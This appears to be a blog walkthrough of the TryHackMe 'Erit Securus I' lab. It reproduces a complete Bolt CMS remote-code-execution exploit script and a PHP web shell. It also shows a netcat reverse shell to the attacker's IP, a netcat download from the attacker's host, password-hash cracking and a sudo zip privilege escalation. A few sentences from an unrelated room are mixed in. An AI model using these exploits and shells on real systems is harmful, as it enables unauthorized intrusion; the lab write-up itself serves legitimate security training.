The platform develops virtual classrooms that not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. Its a comfortable experience to learn using pre-designed courses which include virtual machines (VM) hosted in the cloud.

TryHackMe Erit Securus I walkthrough


While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
  

It seems like our machine got hacked by an anonymous threat actor. However, we are lucky to have a .pcap file from the attack. Can you determine what happened? Download the .pcap file and use Wireshark to view it.  TryHackMe h4cked walkthrough

Let's Start 

we can run a simple nmap scan to look for open ports and services - 

┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit-tryhackme]
└─$ sudo nmap -A -T4 -Pn  -sV -vv  10.10.108.118                                                    
[sudo] password for hackerboy: 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-26 16:05 IST
NSE: Loaded 153 scripts for scanning.
Initiating NSE at 16:05
Completed NSE at 16:05, 0.00s elapsed
Scanning 10.10.108.118 [1000 ports]
Discovered open port 22/tcp on 10.10.108.118
Discovered open port 80/tcp on 10.10.108.118
Completed SYN Stealth Scan at 16:05, 6.47s elapsed (1000 total ports)
Retrying OS detection (try #3) against 10.10.108.118
Completed NSE at 16:05, 0.00s elapsed
Nmap scan report for 10.10.108.118
Host is up, received user-set (0.23s latency).
Scanned at 2021-05-26 16:05:04 IST for 49s
Not shown: 998 closed ports
Reason: 998 resets
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 b1:ac:a9:92:d3:2a:69:91:68:b4:6a:ac:45:43:fb:ed (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBAPWmD4IaPbJQU46GEKX8pUal0IbZzIykktEuUh5boCKMuwsetNGanzNZYFd6eGWRd+zqr6nRnRFQPDiDZtt6DDz7NcJcXliGifQehWEEmskzfhdGSuh+kBUQaqXskCKZi0U/l9P0kvP6bD2SdsXqiYTBGQxN6a4Do1fyE2OoVYgPAAAAFQD4r+hmmsHGFfn0SV1mjGpoHpFwuwAAAIAnnoGwYiWDRAwFoPLkLYWahNwCbLAhVXOb1cnr8NxZN+uRMqEdtoZHNUbTd7ki8j5WpkZhMjFEyZQJg+MNQjUSxISlE1SoBTI8BmAUDAEvgPNyr0CDCS42rAY98JTMhaoZ8FOzgoatLmJWWgWqM+8YHCN4XHoVgm1vMagLsWxW5AAAAIBGW3tnTGis3+eWROnisRfyoo3zawOnd7oijjK7CAiIuxfqc3ESTzeLlkL0QBAIv/1PBGoZSTwg53aZqctO2/BgSNGMWDts3xnqpsEGNyo520Br/cBUyi6rRBotV1kL9tIT4VwdP33F/bjiHHRclfCmOtVYWmkst+HUSqS2yPn1WQ==
|   2048 3a:3f:9f:59:29:c8:20:d7:3a:c5:04:aa:82:36:68:3f (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0zYWd7C1JANU5TctI7lB/tyS9Aid6x5Dh2PnD7fpz6C9Apv9Y/YJzaCUYgqME41ZDxIIiegV02OSCkKFmXvr9gVVKaFHyUVhQ9Zb3FyQeGgWEL3004HIL+G06afXPlsRzNBb5VoqUte+5bigJT5UkyncAfWn+8bWLnFmuXDi5PZ4Pz0RHx9HzCwJ5G26DogQUI6M0zQkhJHzD+nWdIExvoY1L9UN4oZzCuaUF3Tcel3dDnbgi1RaZlfFi3r5NNUtQ7OVijWnms7nYNN7b77CZZWMhE6yMYI8+3ya99CfzA/oYsHv+t8XSbRyAdm5KvETrD8yoBrE14F2FekQQNggx
|   256 f9:2f:bb:e3:ab:95:ee:9e:78:7c:91:18:7d:95:84:ab (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAOH4ypeTzhthRbvcrzqVbbWXG1imFdejEQIo53fimAkjsOcrmEDWwT7Lskm5qyz4dmhGmfsH90xzOgQ+Bm6Nuk=
|   256 49:0e:6f:cb:ec:6c:a5:97:67:cc:3c:31:ad:94:a4:54 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIK7iJO0KhscqLrJgy+mvB3Y+5U+WpOiBAxCr4TKu7pJB
80/tcp open  http    syn-ack ttl 63 nginx 1.6.2
|_http-generator: Bolt
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.6.2
|_http-title: Graece donan, Latine voluptatem vocant. | Erit Securus 1
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=5/26%OT=22%CT=1%CU=33880%PV=Y%DS=2%DC=T%G=Y%TM=60AE248
OS:9%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)

Uptime guess: 0.043 days (since Wed May 26 15:03:51 2021)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 993/tcp)
HOP RTT       ADDRESS
1   264.29 ms 10.8.0.1
2   264.52 ms 10.10.108.118

NSE: Script Post-scanning.
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.48 seconds
           Raw packets sent: 1306 (61.562KB) | Rcvd: 1134 (56.636KB)
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit-tryhackme]
└─$ 

From this result :-

port 22/tcp - SSH (openSSH 6.7p1)

port 80/tcp - HTTP (nginx 1.6.2)

Enumeration 

Examine webserver. Identify what web-app is running. The Content management system that the website is built on can ve found in the http-generator field of the nmap scan. This can also be determined by viewing the website via the browser and scrolling to the bottom of the page:-

Exploit 

Download exploit for this app. The exploit works, but might not fire every time. If you first don't succeed...

CVE - Exploit 

The exploit requires authentication, which means we will require a username and password to proceed. We could attempt to brute force this, but these credentials can be easily guessed using a few simple username/password combinations on the login page.

  # Exploit Title: Bolt CMS 3.7.0 - Authenticated Remote Code Execution
# Date: 2020-04-05
# Exploit Author: r3m0t3nu11
# Vendor Homepage: https://bolt.cm/
# Software Link: https://bolt.cm/
# Version: up to date and 6.x
# Tested on: Linux
# CVE : not-yet-0day

#!/usr/bin/python

import requests
import sys
import warnings
import re
import os
from bs4 import BeautifulSoup
from colorama import init 
from termcolor import colored 
  
init() 
#pip install -r requirements.txt
print(colored('''
 ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄  ▄       ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄       ▄▄  ▄▄▄▄▄▄▄▄▄▄▄      
▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌     ▐░░▌▐░░░░░░░░░░░▌     
▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌      ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌   ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀      
▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌▐░▌ ▐░▌▐░▌▐░▌               
▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄      
▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌  ▐░▌  ▐░▌▐░░░░░░░░░░░▌     
▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌   ▀   ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ 
▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌       ▐░▌          ▐░ 
▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌     ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌
▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌
 ▀▀▀▀▀▀▀▀▀▀   ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀       ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀

Pre Auth rce with low credintanl
#Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex''',"blue"))



if len(sys.argv) != 4:
    print((len(sys.argv)))
    print((colored("[~] Usage : ./bolt.py url username password","red")))
    exit()
url = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]



request = requests.session()
print((colored("[+] Retrieving CSRF token to submit the login form","green")))
page = request.get(url+"/bolt/login")
html_content = page.text
soup = BeautifulSoup(html_content, 'html.parser')
token = soup.findAll('input')[2].get("value")

login_info = {
    "user_login[username]": username,
    "user_login[password]": password,
    "user_login[login]": "",
     "user_login[_token]": token
   }

login_request = request.post(url+"/bolt/login", login_info)
print((colored("[+] Login token is : {0}","green")).format(token))



aaa = request.get(url+"/bolt/profile")
soup0 = BeautifulSoup(aaa.content, 'html.parser')
token0 = soup0.findAll('input')[6].get("value")
data_profile = { 
	"user_profile[password][first]":"password",
	"user_profile[password][second]":"password",
	"user_profile[email]":"a@a.com",
	"user_profile[displayname]":"",
	"user_profile[save]":"",
	"user_profile[_token]":token0

		}
profile = request.post(url+'/bolt/profile',data_profile)




cache_csrf = request.get(url+"/bolt/overview/showcases")

soup1 = BeautifulSoup(cache_csrf.text, 'html.parser')
csrf = soup1.findAll('div')[12].get("data-bolt_csrf_token")


asyncc = request.get(url+"/async/browse/cache/.sessions?multiselect=true")
soup2 = BeautifulSoup(asyncc.text, 'html.parser')
tables = soup2.find_all('span', class_ = 'entry disabled')


print((colored("[+] SESSION INJECTION ","green")))
for all_tables in tables: 
	
	f= open("session.txt","a+")
	f.write(all_tables.text+"\n")
	f.close()
	num_lines = sum(1 for line in open('session.txt'))
	
	renamePostData = {
		"namespace": "root",
		"parent": "/app/cache/.sessions",
		"oldname": all_tables.text,
		"newname": "../../../public/files/test{}.php".format(num_lines),
		"token": csrf
	   }
	rename = request.post(url+"/async/folder/rename", renamePostData)
	



	try:
		url1 = url+'/files/test{}.php?test=ls%20-la'.format(num_lines)

		rev = requests.get(url1).text
		r1 = re.findall('php',rev)
		
		r2 = r1[0]
		if r2 == "php" : 
			fileINJ = "test{}".format(num_lines)
			


			print((colored("[+] FOUND  : "+fileINJ,"green")))
		
	except IndexError:
		print((colored("[-] Not found.","red")))

new_name = 0
while new_name != 'quit':
	inputs = input(colored("Enter OS command , for exit 'quit' : ","green","on_red"))
	if inputs == "quit" :
		exit()
	else:
		a = requests.get(url+"/files/{}.php?test={}".format(fileINJ,inputs))
		aa = a.text
		r11 = re.findall('...displayname";s:..:"([\w\s\W]+)',aa)


		print((r11)[0])
            



  
  

if you want to renamed first so you can.

  ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ ls
48296.py
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ sudo cp 48296.py  exploit.py               
[sudo] password for hackerboy: 
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ ls
48296.py  exploit.py
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ 


  
  

Gaining access

We are ready to run the exploit script against the target:

sudo python3 exploit.py http://<target IP> admin password

  
  ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ sudo python3 exploit.py http://10.10.108.118 admin password

 ▄▄▄▄▄▄▄▄▄▄   ▄▄▄▄▄▄▄▄▄▄▄  ▄       ▄▄▄▄▄▄▄▄▄▄▄  ▄▄▄▄▄▄▄▄▄▄▄  ▄▄       ▄▄  ▄▄▄▄▄▄▄▄▄▄▄      
▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░░▌     ▐░░▌▐░░░░░░░░░░░▌     
▐░█▀▀▀▀▀▀▀█░▌▐░█▀▀▀▀▀▀▀█░▌▐░▌      ▀▀▀▀█░█▀▀▀▀ ▐░█▀▀▀▀▀▀▀▀▀ ▐░▌░▌   ▐░▐░▌▐░█▀▀▀▀▀▀▀▀▀      
▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌▐░▌ ▐░▌▐░▌▐░▌               
▐░█▄▄▄▄▄▄▄█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌ ▐░▐░▌ ▐░▌▐░█▄▄▄▄▄▄▄▄▄      
▐░░░░░░░░░░▌ ▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌  ▐░▌  ▐░▌▐░░░░░░░░░░░▌     
▐░█▀▀▀▀▀▀▀█░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌   ▀   ▐░▌ ▀▀▀▀▀▀▀▀▀█░▌ 
▐░▌       ▐░▌▐░▌       ▐░▌▐░▌          ▐░▌     ▐░▌          ▐░▌       ▐░▌          ▐░ 
▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄█░▌▐░█▄▄▄▄▄▄▄▄▄ ▐░▌     ▐░█▄▄▄▄▄▄▄▄▄ ▐░▌       ▐░▌ ▄▄▄▄▄▄▄▄▄█░▌
▐░░░░░░░░░░▌ ▐░░░░░░░░░░░▌▐░░░░░░░░░░░▌▐░▌     ▐░░░░░░░░░░░▌▐░▌       ▐░▌▐░░░░░░░░░░░▌
 ▀▀▀▀▀▀▀▀▀▀   ▀▀▀▀▀▀▀▀▀▀▀  ▀▀▀▀▀▀▀▀▀▀▀  ▀       ▀▀▀▀▀▀▀▀▀▀▀  ▀         ▀  ▀▀▀▀▀▀▀▀▀▀▀

Pre Auth rce with low credintanl
#Zero-way By @r3m0t3nu11 speical thanks to @dracula @Mr_Hex
[+] Retrieving CSRF token to submit the login form
[+] Login token is : _AJfPiYG9NweZWcPHp4VBBTPffsYer938Wn9Dad6qho
[+] SESSION INJECTION 
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[+] FOUND  : test5
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[-] Not found.
[+] FOUND  : test15
[-] Not found.
Enter OS command , for exit 'quit' : 
                                                                      
  

Now we have access, we can create a simple PHP shell on the server:


echo '<?php system($_GET["cmd"]);?>'>cmd.php

[-] Not found.
[-] Not found.
[+] FOUND  : test15
[-] Not found.
Enter OS command , for exit 'quit' : id
uid=33(www-data) gid=33(www-data) groups=33(www-data)                                                                                           
";s:8:"*stack";a:0:{}s:10:"*enabled";i:1;s:17:"*shadowpassword";N;s:14:"*shadowtoken";N;s:17:"*shadowvalidity";N;s:15:"*failedlogins";i:0;s:17:"*throttleduntil";N;s:8:"*roles";a:2:{i:0;s:4:"root";i:1;s:8:"everyone";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:8:"*token";O:29:"Bolt\Storage\Entity\Authtoken":12:{s:5:"*id";s:1:"3";s:10:"*user_id";i:1;s:8:"*token";s:64:"34e3f69a6fc2261d519381fba1f6b235abc31e4c27f7df4e2559812eaadd53fc";s:7:"*salt";s:32:"d34f9accf4805f6d1eb98f5d698722af";s:11:"*lastseen";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-04-25 12:32:10.117842";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:5:"*ip";s:10:"172.17.0.1";s:12:"*useragent";s:22:"python-requests/2.23.0";s:11:"*validity";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-05-09 12:32:10.000000";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:10:"*checked";i:1587817930;}s:10:"_csrf/bolt";s:43:"Ji6slP_bySLAwmXIDIFpSa6VSGpYwnW2c-2Ik5nEcy0";s:5:"stack";a:0:{}s:18:"_csrf/user_profile";s:43:"lDGl_6zEExwY5SW63TUC0BS-v9JHoXhm9HeVpfFglDc";}s:12:"_sf2_flashes";a:0:{}s:9:"_sf2_meta";a:3:{s:1:"u";i:1587817932;s:1:"c";i:1587817929;s:1:"l";s:1:"0";}}
Enter OS command , for exit 'quit' : 

  

  
  Enter OS command , for exit 'quit' : echo ''>cmd.php
";s:8:"*stack";a:0:{}s:10:"*enabled";i:1;s:17:"*shadowpassword";N;s:14:"*shadowtoken";N;s:17:"*shadowvalidity";N;s:15:"*failedlogins";i:0;s:17:"*throttleduntil";N;s:8:"*roles";a:2:{i:0;s:4:"root";i:1;s:8:"everyone";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:8:"*token";O:29:"Bolt\Storage\Entity\Authtoken":12:{s:5:"*id";s:1:"3";s:10:"*user_id";i:1;s:8:"*token";s:64:"34e3f69a6fc2261d519381fba1f6b235abc31e4c27f7df4e2559812eaadd53fc";s:7:"*salt";s:32:"d34f9accf4805f6d1eb98f5d698722af";s:11:"*lastseen";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-04-25 12:32:10.117842";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:5:"*ip";s:10:"172.17.0.1";s:12:"*useragent";s:22:"python-requests/2.23.0";s:11:"*validity";O:13:"Carbon\Carbon":3:{s:4:"date";s:26:"2020-05-09 12:32:10.000000";s:13:"timezone_type";i:3;s:8:"timezone";s:3:"UTC";}s:7:"_fields";a:0:{}s:42:"Bolt\Storage\Entity\Entity_specialFields";a:2:{i:0;s:3:"app";i:1;s:6:"values";}s:7:"*_app";N;s:12:"*_internal";a:1:{i:0;s:11:"contenttype";}}s:10:"*checked";i:1587817930;}s:10:"_csrf/bolt";s:43:"Ji6slP_bySLAwmXIDIFpSa6VSGpYwnW2c-2Ik5nEcy0";s:5:"stack";a:0:{}s:18:"_csrf/user_profile";s:43:"lDGl_6zEExwY5SW63TUC0BS-v9JHoXhm9HeVpfFglDc";}s:12:"_sf2_flashes";a:0:{}s:9:"_sf2_meta";a:3:{s:1:"u";i:1587817932;s:1:"c";i:1587817929;s:1:"l";s:1:"0";}}
Enter OS command , for exit 'quit' : 

  

This can then be used to upload a netcat reverse shell (as there is no netcat on the target machine). First, we will need to create a symbolic link to netcat on our local machine to the current directory on the target. Run this command via a local terminal:

ln -s $(which nc) .

  
  ┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ ln -s $(which nc) .
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ ls                 
48296.py  exploit.py  nc  session.txt
┌──(hackerboy㉿KumarAtulJaiswal)-[~/Desktop/erit]
└─$ 


  

A simple web server can then be started locally in order to serve the file to the target:

Using the PHP shell we are able to download netcat to the target via the browser:

http://10.10.108.118/files/cmd.php?cmd=wget http://<local-IP>:8080/nc

The file will be transferred to the same directory as the PHP shell. We can make the uploaded netcat file executable by browsing to:

http://10.10.108.118/files/cmd.php?cmd=chmod 755 nc

Next, we need to start a netcat listener on our local machine:-

nc -nvlp 1234

Finally, we can trigger this connection via the browser to get our reverse shell:

http://10.10.108.118/files/cmd.php?cmd=./nc -e /bin/bash <local-IP> 1234

Our reverse shell can then be upgraded to a fully interactive TTY shell by running:


python -c 'import pty;pty.spawn("/bin/bash")'

  
  
www-data@Erit:/var/www/html/public/files$ ls 
ls
cmd.php                       placeholder_ecff05026ae6.jpg  test25.php
index.html                    test1.php                     test26.php
nc                            test10.php                    test27.php
placeholder_07f6539b3d7d.jpg  test11.php                    test28.php
placeholder_0a23551a8097.jpg  test12.php                    test29.php
placeholder_0aa7e8852e11.jpg  test13.php                    test3.php
placeholder_1fad82e5eac1.jpg  test14.php                    test30.php
placeholder_20001088e915.jpg  test15.php                    test31.php
placeholder_46f89a97453b.jpg  test16.php                    test32.php
placeholder_6a843969b527.jpg  test17.php                    test33.php
placeholder_7c21b25839bd.jpg  test18.php                    test4.php
placeholder_84f5c9d2e2c2.jpg  test19.php                    test5.php
placeholder_8a7754ace050.jpg  test2.php                     test6.php
placeholder_8ec2add549d6.jpg  test20.php                    test7.php
placeholder_9cf46a03a9c3.jpg  test21.php                    test8.php
placeholder_aa536d42187b.jpg  test22.php                    test9.php
placeholder_addfa01cba49.jpg  test23.php
placeholder_c45564b83b31.jpg  test24.php
www-data@Erit:/var/www/html/public/files$ 

  

Privilege Escalation

In the /app/database directory you will find the database file: bolt.db


cd ../../app/database
ls

  
  www-data@Erit:/var/www/html/public/files$ cd ../../app/database
cd ../../app/database
www-data@Erit:/var/www/html/app/database$ pwd
pwd
/var/www/html/app/database
www-data@Erit:/var/www/html/app/database$ ls
ls
bolt.db
www-data@Erit:/var/www/html/app/database$ 

The type of database can be determined by running: file bolt.db

  www-data@Erit:/var/www/html/app/database$ file bolt.db
file bolt.db
bolt.db: SQLite 3.x database, last written using SQLite version 3020001
www-data@Erit:/var/www/html/app/database$ 


  
  

We can access this SQLite 3.x database and run the .tables command to display the database tables:

  www-data@Erit:/var/www/html/app/database$ sqlite3 bolt.db
sqlite3 bolt.db
SQLite version 3.16.2 2017-01-06 16:32:41
Enter ".help" for usage hints.
sqlite> 

sqlite> .tables
.tables
bolt_authtoken          bolt_field_value        bolt_pages            
bolt_blocks             bolt_homepage           bolt_relations        
bolt_content_changelog  bolt_log                bolt_showcases        
bolt_cron               bolt_log_change         bolt_taxonomy         
bolt_entries            bolt_log_system         bolt_users            
sqlite> www.kumaratuljaiswal.in

  

The bolt_users table looks interesting, let's have a look at that:

SELECT * FROM bolt_users;

  
  
sqlite> SELECT * FROM bolt_users;   
SELECT * FROM bolt_users;
1|admin|$2y$10$0Z2xl2fs/9xe2HVEkqDZZ.COwXKfHtxsyT5qdHXuJB3XgR7TzeZQi||0|a@a.com|2021-05-26 05:47:53|192.168.100.1|[]|1|||||["root","everyone"]
2|wildone|$2y$10$ZZqbTKKlgDnCMvGD2M0SxeTS3GPSCljXWtd172lI2zj3p6bjOCGq.|Wile E Coyote|0|wild@one.com|2020-04-25 16:03:44|192.168.100.1|[]|1|||||["editor"]
sqlite> www.kumaratuljaiswal.in

  

Two users are listed - admin and wildone (Wile E Coyote). There is also an IP address of 192.168.100.1, which might come in handy later.

We're already admin, so let's try and crack the hash of wildone using JohnTheRipper and the rockyou wordlist.

First, copy the hash to a file and then run: 

we got it -

Once this completes, run the following to view the password, If the password is not visible


john --show hash.txt

This allows us to switch user to wileec and obtain the first flag:

Then, quit in sqlite -

.quit

change the user su wileec with password : snickers

This allows us to switch user to wileec and obtain the first flag:

  
sqlite> .quit
.quit
www-data@Erit:/var/www/html/app/database$ su wileec
su wileec
Password: snickers    

$ whoami
whoami
wileec
$ ls
ls
bolt.db
$ cd ~
cd ~
$ ls
ls
flag1.txt
$ cat flag1.txt
cat flag1.txt
THM{Hey!_Welcome_in}
$ 
                                                                                   
                                                                                   
                            
  

Pivoting

It appears that wileec also has an ssh private key:

ls -la
cd .ssh

  $ ls -la
ls -la
total 28
drwxr-xr-x 4 wileec wileec 4096 Apr 25  2020 .
drwxr-xr-x 4 root   root   4096 Apr 25  2020 ..
-rw-r--r-- 1 wileec wileec  220 May 15  2017 .bash_logout
-rw-r--r-- 1 wileec wileec 3526 May 15  2017 .bashrc
-rw-r--r-- 1 wileec wileec  675 May 15  2017 .profile
drwxr-xr-x 2 wileec wileec 4096 Apr 25  2020 .ssh
-rw-r--r-- 1 root   root     21 Apr 25  2020 flag1.txt
$ cd .ssh
cd .ssh
$ ls -la
ls -la
total 20
drwxr-xr-x 2 wileec wileec 4096 Apr 25  2020 .
drwxr-xr-x 4 wileec wileec 4096 Apr 25  2020 ..
-rw------- 1 wileec wileec 1675 Apr 25  2020 id_rsa
-rw-r--r-- 1 wileec wileec  393 Apr 25  2020 id_rsa.pub
-rw-r--r-- 1 wileec wileec  222 Apr 25  2020 known_hosts
$ www.kumaratuljaiswal.in



  

We can use this to try connecting using the internal IP address we found in the bolt_users table of the SQLite database:

Great, it worked... and, even better, we have some sudo privileges:

sudo -l

Privilege Escalation #2

  $ sudo -l
sudo -l
Matching Defaults entries for wileec on Securus:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User wileec may run the following commands on Securus:
    (jsmith) NOPASSWD: /usr/bin/zip
$ 

$ TF=$(mktemp -u)
TF=$(mktemp -u)
$ sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'
sudo -u jsmith zip $TF /etc/hosts -T -TT 'sh #'
  adding: etc/hosts (deflated 32%)
$ 


  

Awesome! We are now jsmith.

Once again, we can upgrade to a fully interactive shell:

python -c 'import pty;pty.spawn("/bin/bash")'

  
$ python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import pty;pty.spawn("/bin/bash")'
jsmith@Securus:/home/wileec$ whoami
whoami
jsmith
jsmith@Securus:/home/wileec$ #www.kumaratuljaiswal.in
#www.kumaratuljaiswal.in
jsmith@Securus:/home/wileec$ cd ~
cd ~
jsmith@Securus:~$ ls -la
ls -la
total 24
drwxrwx--- 2 jsmith jsmith 4096 Apr 25  2020 .
drwxr-xr-x 4 root   root   4096 Apr 26  2020 ..
-rw-r--r-- 1 jsmith jsmith  220 Nov  5  2016 .bash_logout
-rw-r--r-- 1 jsmith jsmith 3515 Nov  5  2016 .bashrc
-rw-r--r-- 1 jsmith jsmith   33 Apr 25  2020 flag2.txt
-rw-r--r-- 1 jsmith jsmith  675 Nov  5  2016 .profile
jsmith@Securus:~$ 

jsmith@Securus:~$ cat flag2.txt
cat flag2.txt
THM{Welcome_Home_Wile_E_Coyote!}
jsmith@Securus:~$ 
  

  jsmith@Securus:~$ sudo -l
sudo -l
Matching Defaults entries for jsmith on Securus:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jsmith may run the following commands on Securus:
    (ALL : ALL) NOPASSWD: ALL
jsmith@Securus:~$ 




  

Next, we can change to the users home directory and grab the second flag:

jsmith@Securus:~$ sudo su
sudo su
root@Securus:/home/jsmith# whoami
whoami
root
root@Securus:/home/jsmith# ls -la
ls -la
total 24
drwxrwx--- 2 jsmith jsmith 4096 Apr 25  2020 .
drwxr-xr-x 4 root   root   4096 Apr 26  2020 ..
-rw-r--r-- 1 jsmith jsmith  220 Nov  5  2016 .bash_logout
-rw-r--r-- 1 jsmith jsmith 3515 Nov  5  2016 .bashrc
-rw-r--r-- 1 jsmith jsmith   33 Apr 25  2020 flag2.txt
-rw-r--r-- 1 jsmith jsmith  675 Nov  5  2016 .profile
root@Securus:/home/jsmith# #www.kumaratuljaiswal.in
#www.kumaratuljaiswal.in
root@Securus:/home/jsmith# 

root@Securus:/home/jsmith# cd /root
cd /root
root@Securus:~# ls -la
ls -la
total 28
drwx------  4 root root 4096 Apr 26  2020 .
drwxr-xr-x 22 root root 4096 Apr 17  2020 ..
lrwxrwxrwx  1 root root    9 Apr 22  2020 .bash_history -> /dev/null
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
-rw-r--r--  1 root root   43 Apr 25  2020 flag3.txt
drwx------  2 root root 4096 Apr 23  2020 .gnupg
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
drwx------  2 root root 4096 Apr 17  2020 .ssh
root@Securus:~# cat flag3.txt
cat flag3.txt
THM{Great_work!_You_pwned_Erit_Securus_1!}
root@Securus:~# 

Disclaimer

This was written for educational purpose and pentest only.
The author will not be responsible for any damage ..!
The author of this tool is not responsible for any misuse of the information.
You will not misuse the information to gain unauthorized access.
This information shall only be used to expand knowledge and not for causing  malicious or damaging attacks. Performing any hacks without written permission is illegal ..!


All video’s and tutorials are for informational and educational purposes only. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. We believe that it is impossible to defend yourself from hackers without knowing how hacking is done. The tutorials and videos provided on www.hackingtruth.in is only for those who are interested to learn about Ethical Hacking, Security, Penetration Testing and malware analysis. Hacking tutorials is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used.


